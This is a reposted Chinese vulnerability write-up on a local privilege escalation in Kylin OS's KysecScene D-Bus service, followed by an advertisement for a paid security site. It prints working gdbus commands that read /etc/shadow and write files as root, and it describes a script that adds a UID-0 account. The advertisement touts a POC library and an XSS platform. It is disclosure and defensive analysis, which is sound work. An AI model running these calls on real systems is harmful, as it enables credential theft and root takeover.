文章总结: 该文档详细分析了麒麟操作系统KysecSceneD-Bus服务存在的本地提权漏洞,该服务以root权限运行但D-Bus策略配置过于宽松,允许任意本地用户调用敏感方法。其暴露的LoadJson和SaveJson方法缺乏对文件路径的访问控制和校验,导致低权限用户可读取高敏感文件(如/etc/shadow)并以root身份向任意路径写入数据,从而形成完整的本地提权链,最终获得root权限并完全控制系统。文档提供了漏洞定位过程、成因分析、PoC验证步骤及影响评估,并建议收紧D-Bus调用策略与接口输入校验。 综合评分: 85 文章分类: 漏洞分析,二进制安全,操作系统安全,红队,渗透测试
0day 麒麟操作系统 KysecScene D-Bus 服务本地提权漏洞分析 附poc
原创
KoWayMin KoWayMin
棉花糖fans
2026年2月25日 08:46 四川
#
- 作者:中龙技术 KoWayMin
- 报告日期:2026 年 2 月 12 日
- 漏洞类型:本地权限提升(LPE)
一、漏洞概述
该漏洞存在于麒麟系统中的 com.kylin.KysecScene D-Bus 系统服务。该服务以 root 权限运行,但其 D-Bus 策略配置过于宽松,允许任意本地用户直接调用敏感方法。同时,服务暴露的 LoadJson 与 SaveJson 方法对传入文件路径缺乏访问控制与路径校验,导致低权限用户可借助该服务实现:
- 读取高敏感文件(如
/etc/shadow)。 - 以 root 身份向任意路径写入数据(如
/etc/passwd)。
最终可形成完整的本地提权链,攻击者能够获得 root 权限并完全控制系统。
二、漏洞定位过程
1. 枚举系统 D-Bus 服务
通过以下命令可定位到目标服务:
busctl --system list | grep -i kylin
输出中可见:
com.kylin.KysecScene ... root ...
这表明 KysecScene 由 root 身份运行。
2. 检查 D-Bus 策略文件
策略文件路径如下:
cat /usr/share/dbus-1/system.d/com.kylin.KysecScene.conf
关键配置(原意)为允许默认上下文用户访问该服务:
<policy context="default">
<allow own="com.kylin.KysecScene"/>
<allow send_destination="com.kylin.KysecScene"/>
<allow send_destination="com.kylin.KysecScene"
send_interface="org.freedesktop.DBus.Introspectable"/>
<allow send_destination="com.kylin.KysecScene"
send_interface="org.freedesktop.DBus.Properties"/>
</policy>
该策略意味着本地普通用户也可向目标服务发起方法调用,权限边界被显著削弱。
3. 枚举可调用方法
gdbus introspect --system \
--dest com.kylin.KysecScene \
--object-path /com/kylin/KysecScene
可见核心接口:
LoadJson(in s file_path, out ay arg_1) # 任意文件读取
SaveJson(in s file_path, in ay data, out i arg_2) # 任意文件写入
这两个方法均接受外部提供的文件路径,且报告显示缺乏有效校验。
三、漏洞成因分析
漏洞的本质是“高权限服务 + 低门槛调用 + 危险文件操作接口”三者叠加:
- 服务高权限运行:
KysecScene进程为 root。 - 调用控制过宽:D-Bus 策略向默认本地用户开放。
- 方法缺少安全约束:
LoadJson/SaveJson可操作任意路径,未限制目录、未鉴权、未做安全过滤。
因此,普通用户可借服务完成本应仅 root 才能执行的读写操作,从而打通提权路径。
四、PoC 验证过程
1. 任意文件读取(读取 /etc/shadow)
先验证普通用户无法直接读取:
whoami
cat /etc/shadow
# cat: /etc/shadow: Permission denied
再通过 D-Bus 调用:
gdbus call --system \
--dest com.kylin.KysecScene \
--object-path /com/kylin/KysecScene \
--method com.kylin.KysecScene.LoadJson \
/etc/shadow
返回数据为十六进制字节数组,其中可解析出 root 等账户口令条目信息,证明低权限用户已可越权读取敏感凭据文件。
2. 任意文件写入(以 root 身份写文件)
构造测试数据:
666 YDBYL KYLIN POC\n
转换为字节数组后调用:
gdbus call --system \
--dest com.kylin.KysecScene \
--object-path /com/kylin/KysecScene \
--method com.kylin.KysecScene.SaveJson \
/tmp/kylin_poc \
"[0x36,0x36,0x36,0x20,0x59,0x44,0x42,0x59,0x4c,0x20,0x4b,0x59,0x4c,0x49,0x4e,0x20,0x50,0x4f,0x43,0x0a]"
验证结果:
cat /tmp/kylin_poc
ls -l /tmp/kylin_poc
报告显示该文件所有者为
root,说明普通用户已借助该接口完成 root 权限写入。
3. 完整提权链(poc.py)
python3 poc.py --rf <file> | --useradd <username>
--rf /etc/shadow:演示敏感文件读取。--useradd testuser2:向系统账户文件写入 UID=0 用户。
复现输出显示:
uid=0(testuser2) gid=0(root)
即普通用户可进一步获取 root shell,并访问 /root 目录,实现完全接管。
五、影响评估
该漏洞可导致以下安全后果:
- 敏感信息泄露:读取
/etc/shadow等核心文件。 - 任意文件篡改:覆盖系统配置或认证文件。
- 本地权限提升至 root:创建 UID=0 账户、植入后门、维持持久化控制。
- 系统完全失陷:完整性、机密性、可用性均受到严重威胁。
六、结论
com.kylin.KysecScene 的核心问题在于:以 root 运行的系统服务向普通本地用户暴露了缺乏校验的文件读写能力。该设计缺陷使攻击者无需内核漏洞,仅通过 D-Bus 接口即可从低权限用户提升到 root,属于高危本地提权漏洞。
从防护角度看,必须同时收紧 D-Bus 调用策略与接口输入校验,避免高权限服务直接对外提供任意路径文件操作能力。
poc.py以及poc.sh获取请后台回复260225
广告时间:
棉花糖会员站
网络安全行业领先网站|在线独立环境内网靶场
性价比拉满,进站不心动来砍我
开通说明
糖心会员仅需99元/年,续费8折,会员邀请好友开通/续费享15%佣金。
网站性质特殊,开通不支持退款,请确认需求后再开通。
Part 01|无境靶场
提供会员免费在线独立环境网安靶场;内网靶场同样独立环境;持续更新内网/Web/原创/SRC/CTF靶场,一直加量不加价。
Part 02|独家代码审计工具
无需本地编译,支持全路由报告,适合实战审计与日常排查。
Part 03|POC库
全网最新/体量大的POC资源聚合;公开与付费POC统一检索;配合微信会员服务号,关键词即可查找相关POC。
Part 04|账号共享
会员享受网安常用服务,含资产引擎,以及Shodan、CTF平台等,满足学习与工作需求。
Part 05|更多在线工具
hash解密平台、SRC资产监控、含国标/国密文件获取、凌风云搜索结果获取、IP街道级定位公益服务(ip.sy)、XSS平台等实用工具。
Part 06|文档工具库
覆盖护网、应急响应、面试、CTF等场景,资源量大;同样支持微信服务号全文关键词检索。
Part 07|教程大全
聚合大量资源网/源码网/教程站会员内容,减少多站重复付费成本,学习路径更集中。
Part 08|会员专属群
加入微信500人付费会员群,拥有网安领域更精准的交流环境。
Part 09|用户好评
付费服务持续三年,在期会员三千位,好评稳定;本文仅展示部分资源,更多网站内容可点击阅读原文进入网站后查看:vip.bdziyi.com
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:棉花糖fans KoWayMin KoWayMin《0day 麒麟操作系统 KysecScene D-Bus 服务本地提权漏洞分析 附poc》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论